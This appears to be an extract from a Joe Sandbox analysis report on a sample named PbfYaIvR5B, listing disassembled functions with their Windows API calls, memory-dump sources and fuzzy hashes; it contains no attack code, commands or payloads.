                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    • Opcode ID: d07f3d8d149a297f0a89f0dc346e909d9912735d985fd2ca1a316d1f48c1f73f
                                                                                                                    • Instruction ID: 54a69414b08b1e2ee336cc509cf69408df861cbb680f6d0a14aa6a84515d6633
                                                                                                                    • Opcode Fuzzy Hash: d07f3d8d149a297f0a89f0dc346e909d9912735d985fd2ca1a316d1f48c1f73f
                                                                                                                    • Instruction Fuzzy Hash: DBE05530F46208BBE200BB24CC02D6FBB91DB05721B0040A8FE0EBB240CE3C4E418ACA
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0005EAF9
                                                                                                                      • Part of subcall function 0005E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005E8D0
                                                                                                                      • Part of subcall function 0005E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 3So
                                                                                                                    • API String ID: 1269201914-1105799393
                                                                                                                    • Opcode ID: 922a99036b7f594292d9150e4004b4815f8f21c954fed95267ff7c37ec009c84
                                                                                                                    • Instruction ID: df333861c2e4f841e8cc4207ca739a3efc9ee6afe79b087f51fb14b21854b41d
                                                                                                                    • Opcode Fuzzy Hash: 922a99036b7f594292d9150e4004b4815f8f21c954fed95267ff7c37ec009c84
                                                                                                                    • Instruction Fuzzy Hash: 14B012DA29A1C27C311C6250DD43C3B020CC3C1B92330D02FFD98CC082DC842E090832
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006B7BB: GetOEMCP.KERNEL32(00000000,?,?,0006BA44,?), ref: 0006B7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0006BA89,?,00000000), ref: 0006BC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,0006BA89,?,?,?,0006BA89,?,00000000), ref: 0006BC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    • Opcode ID: 07856abccbd88bb9ce459606d0654b797daaae166c13e5e07a1048f29e5c6638
                                                                                                                    • Instruction ID: 265cc415345b892979cc566568b647d8f0714b49b62c8cb0727bbdee2caa0cd5
                                                                                                                    • Opcode Fuzzy Hash: 07856abccbd88bb9ce459606d0654b797daaae166c13e5e07a1048f29e5c6638
                                                                                                                    • Instruction Fuzzy Hash: DA5105B1D042459EDB209F75C8816FABBE6EF41310F14447ED496CF252EB399A85CB90
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00049A50,?,?,00000000,?,?,00048CBC,?), ref: 00049BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00048411,-00009570,00000000,000007F3), ref: 00049BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: ba6a4bf99245bb37aea3a9fb7a1a6fcf5220efb3314257bfa415192ae3c1f0e1
                                                                                                                    • Instruction ID: 43d3c11471cd748909e88714b44ede1c7ae79adc5f544974763925369d59e6fe
                                                                                                                    • Opcode Fuzzy Hash: ba6a4bf99245bb37aea3a9fb7a1a6fcf5220efb3314257bfa415192ae3c1f0e1
                                                                                                                    • Instruction Fuzzy Hash: F541DFB0A043018FEB24DF15E68486BB7E6FFD4320F158A3DE88583261D774ED458ADA
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000697E5: GetLastError.KERNEL32(?,00081030,00064674,00081030,?,?,00063F73,00000050,?,00081030,00000200), ref: 000697E9
                                                                                                                      • Part of subcall function 000697E5: _free.LIBCMT ref: 0006981C
                                                                                                                      • Part of subcall function 000697E5: SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 0006985D
                                                                                                                      • Part of subcall function 000697E5: _abort.LIBCMT ref: 00069863
                                                                                                                      • Part of subcall function 0006BB4E: _abort.LIBCMT ref: 0006BB80
                                                                                                                      • Part of subcall function 0006BB4E: _free.LIBCMT ref: 0006BBB4
                                                                                                                      • Part of subcall function 0006B7BB: GetOEMCP.KERNEL32(00000000,?,?,0006BA44,?), ref: 0006B7E6
                                                                                                                    • _free.LIBCMT ref: 0006BA9F
                                                                                                                    • _free.LIBCMT ref: 0006BAD5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2991157371-0
                                                                                                                    • Opcode ID: 27b42ba5a761508c1506cba0af3d8171cc5710f56598d79db90b6806264a6c20
                                                                                                                    • Instruction ID: a0092e38e730e3907828d1092ffb39671f1bc5886d4ec9c26d1ca672ec996e65
                                                                                                                    • Opcode Fuzzy Hash: 27b42ba5a761508c1506cba0af3d8171cc5710f56598d79db90b6806264a6c20
                                                                                                                    • Instruction Fuzzy Hash: AA31E571904209AFDB10EFA8D841BADB7F7EF40324F214199E904DB2A3EB765D80DB51
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00041E55
                                                                                                                      • Part of subcall function 00043BBA: __EH_prolog.LIBCMT ref: 00043BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00041EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    • Opcode ID: e783302ddfd24a4fdc98f2f7f6095ec2d1389e1cd5c43c5c716bca7d196d4257
                                                                                                                    • Instruction ID: 4db98c54e8988c8aedc0f04045e652034b864fc702c2b5b90b0dfe598feaf5a7
                                                                                                                    • Opcode Fuzzy Hash: e783302ddfd24a4fdc98f2f7f6095ec2d1389e1cd5c43c5c716bca7d196d4257
                                                                                                                    • Instruction Fuzzy Hash: AC315AB5904209AFCF15DF99C945AEEFBF6AF48300F1040AAF845A7252CB365E45CB68
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000473BC,?,?,?,00000000), ref: 00049DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00049E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    • Opcode ID: 6d9e68e358630e8281e2c0585dfe8b28cc67b932ca843af2bcce249cb51679b3
                                                                                                                    • Instruction ID: a30490222373c274ca759d12a2aa04fed53bc53501cb22497938612e8b52cbd7
                                                                                                                    • Opcode Fuzzy Hash: 6d9e68e358630e8281e2c0585dfe8b28cc67b932ca843af2bcce249cb51679b3
                                                                                                                    • Instruction Fuzzy Hash: 1821F372648245AFD714CF35C891AABBBE8AF55304F08493CF8C587141D339EA0CDBA5
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00049F27,?,?,0004771A), ref: 000496E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00049F27,?,?,0004771A), ref: 00049716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: f24f6695be205f178172ec74e252530a0afc3eec5f8f31ec2bb8e45c5ace8b0e
                                                                                                                    • Instruction ID: ade871bc857928ef826ab9b0d090dc6ba37c49ed2989aa3b0c5ec3258330c023
                                                                                                                    • Opcode Fuzzy Hash: f24f6695be205f178172ec74e252530a0afc3eec5f8f31ec2bb8e45c5ace8b0e
                                                                                                                    • Instruction Fuzzy Hash: 0F21C1B15043446FE3708A65CC89FE7B7DCEB49321F010A39F9D5C21D2C7B8A8849A71
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00049EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00049ED4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: c65ff05251547c93755805c9addbb7c4d7f4b288e06e7be1bf4ac4d4e0d49ee7
                                                                                                                    • Instruction ID: b718b35fd92e35c514ff1ac9bb931b4f0143a7a467fe0598f5990b703fe5c48a
                                                                                                                    • Opcode Fuzzy Hash: c65ff05251547c93755805c9addbb7c4d7f4b288e06e7be1bf4ac4d4e0d49ee7
                                                                                                                    • Instruction Fuzzy Hash: 8711E5B0A00700ABE734D629CC44BABB7E8AF45360F604A39E153D26D1D7B4ED49D764
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00068E75
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00081098,000417CE,?,?,00000007,?,?,?,000413D6,?,00000000), ref: 00068EB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    • Opcode ID: f6dbf45488e4d3ffd167e21821be0227497d954ed8ab7fb31d04ed64564c64f1
                                                                                                                    • Instruction ID: 8d73fdf587c9018e125c656b45fcb25a19d87cd248add949cda3c50838002410
                                                                                                                    • Opcode Fuzzy Hash: f6dbf45488e4d3ffd167e21821be0227497d954ed8ab7fb31d04ed64564c64f1
                                                                                                                    • Instruction Fuzzy Hash: 19F0F6326011116ADB312A259C04BAF379F8FD2B70F25C326F818AA192DF77CD0083A0
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 000510AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 000510B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    • Opcode ID: a59dbd8bb86f3548ce6cf603b559703d8bcbbd5f0c9382ffa3cfb2307b1b4a1b
                                                                                                                    • Instruction ID: b9d32bf2f922e3325e4e1f208c921f774b2e1d44c2956b2dab44fb2a50910d69
                                                                                                                    • Opcode Fuzzy Hash: a59dbd8bb86f3548ce6cf603b559703d8bcbbd5f0c9382ffa3cfb2307b1b4a1b
                                                                                                                    • Instruction Fuzzy Hash: 7AE0D832F10155A7DF0D87B49C15AEFB3DDEB442093145275E803E3141F9B8DE8546E0
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A501
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A532
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 8f329da50211005a173c233128aa7ed4e41c10b9885951d8c7b4bec148f4733a
                                                                                                                    • Instruction ID: 0eeeac95467de49e61e2b09a3ac20ad00d15b1d7425882454f63f57d7d0ee507
                                                                                                                    • Opcode Fuzzy Hash: 8f329da50211005a173c233128aa7ed4e41c10b9885951d8c7b4bec148f4733a
                                                                                                                    • Instruction Fuzzy Hash: 4BF0A932240209BBEF016F60DC01FDA3BACAB04385F488061BC48E6160DB75DAE8EB90
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0004977F,?,?,000495CF,?,?,?,?,?,00072641,000000FF), ref: 0004A1F1
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
